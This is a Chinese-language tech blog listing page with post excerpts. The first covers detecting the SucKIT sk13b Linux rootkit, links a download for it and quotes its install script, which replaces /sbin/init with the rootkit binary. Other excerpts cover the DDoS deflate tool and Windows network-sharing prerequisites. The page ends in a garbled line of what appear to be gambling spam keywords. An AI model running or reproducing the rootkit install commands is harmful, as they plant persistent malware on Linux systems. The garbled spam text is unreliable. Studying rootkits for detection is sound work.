预览模式: 普通 | 列表

检测sk13b suckit linux rootkit

看了下面几行,再看看chkrootkit和rkhunter的检测代码,就知道为啥默认安装的suckit sk这么好检测了。检测sk1.x其实还有其他的方法,可以检测隐藏进程,还可以利用sk13b的一些bug来做检测 :) sk13b里还有个好东西,那就是让人怀念的elfuck,经典的ELF加密程序。

顺便发个sk13b的下载地址。04年的东西现在还能用,真没想到,一个内核rootkit写成这样,让那些经常更新还不稳定的软件情何以堪啊。

http://www.xfocus.net/tools/200408/763.html

inst文件是sk的安装包,默认会执行下面的安装指令

\000″ | gzip -d > sk
chmod 0755 sk; if [ ! -f /sbin/init${H} ];  then cp -f /sbin/init /sbin/init${H}; fi; rm -f /sbin/init; cp sk /sbin/init
echo Your home is $D, go there and type ./sk to install
echo us into memory.   Have fun!

查看更多...

Tags: sk13b suckit linux rootkit

分类:技术资料 | 固定链接 | 禁止评论 | 引用: 0 | 查看次数: 1639
DDoS deflate是一款Linux/centos减轻/防止ddos攻击的一个小程序,相当于软件防火墙。注意,此程序仅仅能抵御较低流量的攻击,大流量攻击连用了上百台高档服务器做了负载均衡的新浪都扛不住,何况一个小小的普通服务器或vps。对此程序不要期望过高。这里仅仅介绍一下,对于一些简单的软件攻击可能还有点作用。

安装后,可以手工运行脚本
/usr/local/ddos/ddos.sh -k 50 强行屏蔽连接数大于50的IP
更多使用说明,请直接 more /usr/local/ddos/ddos.sh 查看

查看更多...

Tags: linux DDos 轻量 软件

分类:技术资料 | 固定链接 | 禁止评论 | 引用: 0 | 查看次数: 1580

常见的网上邻居访问问题汇集

Windows网上邻居互访的基本条件:
      1) 双方计算机打开,且设置了网络共享资源;
      2) 双方的计算机添加了 "Microsoft 网络文件和打印共享" 服务;
      3) 双方都正确设置了网内IP地址,且必须在一个网段中;
      4) 双方的计算机中都关闭了防火墙,或者防火墙策略中没有阻止网上邻居访问的策略。

查看更多...

Tags: 网上邻居

分类:技术资料 | 固定链接 | 禁止评论 | 引用: 0 | 查看次数: 1356

:Ŷij ֽ Ͼ ֳ ϶ ֽIJ Ͼ Ͼֳ ӹ ֳ թ 򿪻 Ͷע Űټ Žɳ ˹ 21 365bet Žɳ Žɳַ ÷ ˹˹ ˹ַ ֽ IJ IJ IJ ij ţ hg0088 ϻ ϻϷ